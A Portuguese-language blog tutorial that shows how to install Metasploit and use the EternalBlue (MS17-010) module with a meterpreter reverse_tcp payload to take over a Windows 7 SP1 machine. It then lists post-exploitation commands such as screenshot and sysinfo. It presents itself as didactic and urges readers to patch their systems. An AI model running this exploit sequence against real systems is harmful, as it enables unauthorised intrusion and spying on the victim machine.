Sistemas operacionaisWindows

Como Acessar o Windows pelo Linux com Metasploit

O Metasploit é uma ferramenta usada por pentesters para avaliar as capacidade de segurança de um sistema, fazer invasões e também detectar intrusos. É uma ferramenta muito comum em distribuições Linux voltadas para este meio, como o Kali Linux. Hoje você vai conhecer uma de suas facetas. 

O Metasploit é um projeto de segurança da informação que fornece informações sobre vulnerabilidades de segurança e ajuda nos testes de penetração. É de propriedade da empresa de segurança Rapid7, de Boston, Massachusetts, que possui diversos softwares (OpcodeBanco de Dados ; e o Shellcode , que executa comandos de Shell Script… ), entre eles o mais conhecido é o Metasploit Framework, um software de código aberto para explorar falhas de uma máquina remota.

O Metasploit possui 6 tipos de módulos (auxiliary, exploit, payload, post, encoder e nop) . No vídeo apresentado por nós, vamos utilizar o Meterpreter que é um payload avançado.

Instalação

Existem diversas maneiras de você instalar o Metasploit Framework. Baixando diretamente pelo site  ou pelo GitHub

Para quem gosta de fazer manualmente, é possível instalá-lo via gerenciador de pacotes da sua distribuição, por exemplo, na distribuição Ubuntu, Linux Mint, Debian e derivados basta realizar os comandos abaixo:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
sudo ./msfinstall
msfdb init

E pronto, o Metasploit está pronto para uso! 

Lembrando que em algumas distribuições já possuem o Metasploit instalado por padrão, como o Pentoo e o Kali Linux, entre  outras criadas especialmente para testes de invasão.

O Próximo passo é rodar o Metasploit por este comando:

msfconsole

Isso irá abrir o framework, e em seguida usaremos o Meterpreter para acessar o Windows , basta rodar os comandos abaixo na ordem:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST NÚMERO_IP_DA_MÁQUINA_WINDOWS
set payload windows/x64/meterpreter/reverse_tcp
set LHOST NÚMERO_IP_DA_SUA_MÁQUINA
set encoder generic/none
exploit

Lembrando que esses comandos são “a grosso modo”, e servem para Windows 7 Service Pack 1 , para outras versões assista o vídeo com link abaixo que há mais detalhes para variados casos.

Após acessar você pode obter informações detalhadas do sistema com o comando sysinfo; tirar um print da tela com o comando screenshot ; saber qual diretório você está com o comando pwd a saída será algo do tipo *c:32* ; desligar, reiniciar,… entre vários  comandos  que podem ser  consultados  pelo comando help .

Confira o exemplo no vídeo:

Esse artigo e o vídeo apresentado foram criados com finalidade didática, mantenha o seu Windows atualizado para evitar ser exposto a coisas do tipo. A falha explorada neste exemplo, por exemplo, já foi corrigida pela Microsoft, daí a importância de manter os sistemas sempre atualizados.

Se você ainda não domina Shell Script e o Terminal Linux. Aproveite uma promoção onde você pode adquirir 5 cursos de terminal Linux, incluindo Shell Script, Expressões Regulares, Vim e Sed. 

Clicando nesse link http://bit.ly/Promo5pg para adquirir com o PagSeguro ou nesse link http://bit.ly/5CursosLinux para adquirir com o PayPal. Se quiser mais detalhes da promoção veja essa postagem: 5 Cursos do Terminal Linux para você !

Esse artigo foi escrito em parceria com a galera do Terminal Root, os quais são os autores dos cursos mencionados acima, até a próxima!


Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.

Diolinux Ofertas - Aproveite os melhores descontos em diversos produtos!